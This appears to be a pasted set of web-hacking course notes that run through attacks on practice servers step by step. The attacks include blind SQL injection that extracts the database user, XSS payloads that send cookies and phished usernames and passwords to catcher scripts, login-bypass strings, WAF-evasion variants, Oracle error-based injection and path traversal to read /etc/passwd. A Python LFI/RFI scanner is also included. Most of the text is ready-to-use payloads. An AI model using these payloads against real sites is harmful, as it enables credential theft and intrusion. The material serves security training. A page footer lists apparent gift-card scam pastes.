3044		Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
3045
3046		D - 1st Character
3047		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
3048		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
3049		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
3050		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
3051
3052		B - 2nd Character
3053		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3054		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3055
3056		O - 3rd Character
3057		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3058		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
3059		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3060		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3061		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
3062		http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3063
3064
3065
3066
3067
3068
3069
3070
3071
3072
3073		###################################################################
3074		# What is XSS #
3075		# https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
3076		###################################################################
3077
3078		OK - what is Cross Site Scripting (XSS)
3079
3080		1. Use Firefox to browse to the following location:
3081
3082		http://54.172.112.249/xss_practice/
3083
3084		A really simple search page that is vulnerable should come up.
3085
3086
3087
3088
3089		2. In the search box type:
3090
3091		<script>alert('So this is XSS')</script>
3092
3093
3094		This should pop-up an alert window with your message in it proving XSS is in fact possible.
3095		Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
3096
3097
3098		3. In the search box type:
3099
3100		<script>alert(document.cookie)</script>
3101
3102
3103		This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
3104		Ok, click OK and then click back and go back to http://554.172.112.249/xss_practice/
3105
3106		4. Now replace that alert script with:
3107
3108		<script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
3109
3110
3111		This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
3112
3113
3114		5. Now view the stolen cookie at:
3115		http://54.172.112.249/xss_practice/cookie_stealer_logs.html
3116
3117
3118		The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
3119
3120
3121
3122
3123
3124
3125		############################
3126		# A Better Way To Demo XSS #
3127		############################
3128
3129
3130		Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
3131
3132
3133		Use Firefox to browse to the following location:
3134
3135		http://54.172.112.249/xss_practice/
3136
3137
3138
3139		Paste this in the search box
3140		----------------------------
3141
3142
3143		Option 1
3144		--------
3145
3146		<script>
3147		password=prompt('Your session is expired. Please enter your password to continue',' ');
3148		document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
3149		</script>
3150
3151
3152		Now view the stolen cookie at:
3153		http://54.172.112.249/xss_practice/passwords.html
3154
3155
3156
3157		Option 2
3158		--------
3159		<script>
3160		username=prompt('Please enter your username',' ');
3161		password=prompt('Please enter your password',' ');
3162		document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
3163		</script>
3164
3165
3166
3167
3168		Now view the stolen cookie at:
3169		http://54.172.112.249/xss_practice/username_password_logs.html
3170
3171
3172
3173
3174		#########################################
3175		# Let's kick it up a notch with ASP.NET #
3176		# http://54.200.178.220/ #
3177		#########################################
3178
3179
3180		The trading Web App is on http://54.200.178.220/
3181
3182
3183		Try the following in the search box:
3184		<script>alert(123);</script>
3185		' or 1=1
3186		' and a=a
3187		1=1
3188		Joe'+OR+1=1;--
3189
3190
3191		<script>alert(123);</script>
3192
3193		Open a new tab in firefox and try this:
3194		http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
3195
3196
3197		Try the contact us form.
3198		Open a new tab in firefox and try this:
3199		http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
3200
3201		Try this on the inquiry form:
3202		Joe McCray
3203		1234567890
3204		joe@strategicsec.com') waitfor delay '00:00:10'--
3205
3206
3207		Login Box:
3208
3209		' or 1=1 or ''='
3210		anything (click login instead of pressing enter)
3211
3212
3213
3214		Tamper Data: (notice 2 session IDs)
3215
3216		AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
3217		IsAdmin=yes;
3218		ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
3219
3220
3221
3222		Profile - Detail (tamper data)
3223		Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
3224		joe\|set
3225
3226
3227		xss_upload.txt (Upload Bulk Order)
3228		<script>alert(123);</script>
3229
3230
3231
3232
3233		###############################
3234		# How much fuzzing is enough? #
3235		###############################
3236		There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
3237
3238		Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
3239
3240
3241		Step 1: Ask yourself the 3 questions per page of the site.
3242
3243		Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
3244
3245		Step 3: When you load your fuzz strings - use the following decision tree
3246
3247		- Are the fuzz strings causing a default error message (example 404)?
3248		- If this is the case then it is most likely NOT vulnerable
3249
3250		- Are the fuzz strings causing a WAF or LB custom error message?
3251		- If this is the case then you need to find an encoding method to bypass
3252
3253
3254		- Are the fuzz strings causing an error message that discloses the backend type?
3255		- If yes, then identify DB type and find correct syntax to successfully exploit
3256		- Some example strings that I use are:
3257		'
3258		"
3259		() <----- Take the parameter value and put it in parenthesis
3260		(5-1) <----- See if you can perform an arithmetic function
3261
3262
3263		- Are the fuzz strings rendering executable code?
3264		- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
3265		- Some example strings that I use are:
3266		<b>hello</b>
3267		<u>hello</u>
3268		<script>alert(123);</script>
3269		<script>alert(xss);</script>
3270		<script>alert('xss');</script>
3271		<script>alert("xss");</script>
3272
3273
3274
3275
3276
3277
3278		############################
3279		# Trading Web App with WAF #
3280		# http://54.213.131.105 #
3281		############################
3282
3283
3284		Try the following in the search box:
3285		<script>alert(123);</script>
3286		<script>alert(123);</script
3287		<script>alert(123)
3288		<script>alert
3289		<script>
3290		<script
3291		<scrip
3292		<scri
3293		<scr
3294		<sc
3295		<s
3296		<p
3297		<
3298		< s
3299		Joe'+OR+1=1;--
3300
3301
3302		Open a new tab in firefox and try this:
3303		http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
3304
3305
3306		xss_upload.txt (Upload Bulk Order)
3307		<script>alert(123);</script>
3308
3309
3310		Login Box:
3311
3312		' or 1=1 or ''='
3313		anything
3314
3315
3316
3317		Tamper Data: (notice 2 session IDs)
3318
3319		AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
3320		IsAdmin=yes;
3321		ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
3322
3323
3324
3325		Profile - Detail (tamper data)
3326		Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
3327		joe\|set
3328
3329
3330
3331
3332
3333
3334
3335		###########################################################
3336		# Attacking an Oracle/JSP based WebApp with SQL Injection #
3337		###########################################################
3338
3339
3340
3341
3342
3343		http://54.69.156.253:8081/bookcompany/
3344
3345
3346		user: a' OR 'a'='a
3347		pass: a' OR 'a'='a
3348
3349
3350
3351
3352
3353
3354
3355		http://54.69.156.253:8081/bookcompany/author.jsp?id=111
3356
3357
3358		[ Search by Username ] Joe' OR 'a'='a
3359
3360
3361
3362
3363
3364
3365
3366
3367
3368
3369
3370
3371		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
3372
3373
3374
3375		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
3376
3377
3378
3379
3380
3381
3382
3383
3384
3385
3386
3387
3388
3389
3390
3391		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
3392
3393
3394		Host is running:
3395
3396
3397
3398
3399
3400		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
3401
3402		User is:
3403
3404
3405
3406
3407
3408		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
3409
3410		Current database is:
3411		RAW Paste Data
3412
3413
3414
3415
3416		######################
3417		# Lesson 27: Web App #
3418		######################
3419		vi wpbruteforcer.py
3420
3421
3422		python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
3423
3424
3425
3426		- Here is an example of an LFI
3427		- Open this page in Firefox:
3428		http://54.172.112.249/showfile.php?filename=contactus.txt
3429
3430		- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
3431		- Here you see a direct reference to a file on the local filesystem of the victim machine.
3432		- You can attack this by doing the following:
3433		http://54.172.112.249/showfile.php?filename=/etc/passwd
3434
3435		- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
3436		- somewhere else on the Internet. Here is an example of a text file on the web:
3437		http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
3438
3439		- Now we can attack the target via RFI like this:
3440		http://54.172.112.249/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
3441
3442
3443		- Now let's see if we can write some code to do this for us:
3444
3445		vi LFI-RFI.py
3446
3447
3448
3449		#!/usr/bin/env python
3450		print "\n### PHP LFI/RFI Detector ###"
3451		print "### Sean Arries 09/18/09 ###\n"
3452
3453		import urllib2,re,sys
3454
3455
3456		TARGET = "http://554.172.112.249/showfile.php?filename=contactus.txt"
3457		RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
3458		TravLimit = 12
3459
3460		print "==> Testing for LFI vulns.."
3461		TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
3462		for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
3463		TARGET += "../"
3464		try:
3465		source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
3466		except urllib2.URLError, e:
3467		print "$$$ We had an Error:",e
3468		sys.exit(0)
3469		if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
3470		print "!! ==> LFI Found:",TARGET+"etc/passwd"
3471		break ## BREAK LOOP WHEN VULN FOUND
3472
3473		print "\n==> Testing for RFI vulns.."
3474		TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
3475		try:
3476		source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
3477		except urllib2.URLError, e:
3478		print "$$$ We had an Error:",e
3479		sys.exit(0)
3480		if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
3481		print "!! => RFI Found:",TARGET
3482
3483
3484		print "\nScan Complete\n" ## DONE

Public Pastes

💰G2A.com Free Gift Card Guide May 2024 FIX💰
Python | 4 min ago | 0.36 KB
Area dot java
Java | 10 min ago | 4.28 KB
💰G2A.com Free Gift Card Guide May 2024 FIX🎉
Python | 10 min ago | 0.36 KB
Untitled
C++ | 15 min ago | 1.27 KB
Unity Bootstrapping
C# | 18 min ago | 0.48 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 🎁
GetText | 21 min ago | 0.36 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 🤑
GetText | 31 min ago | 0.39 KB
niente
JavaScript | 47 min ago | 1.91 KB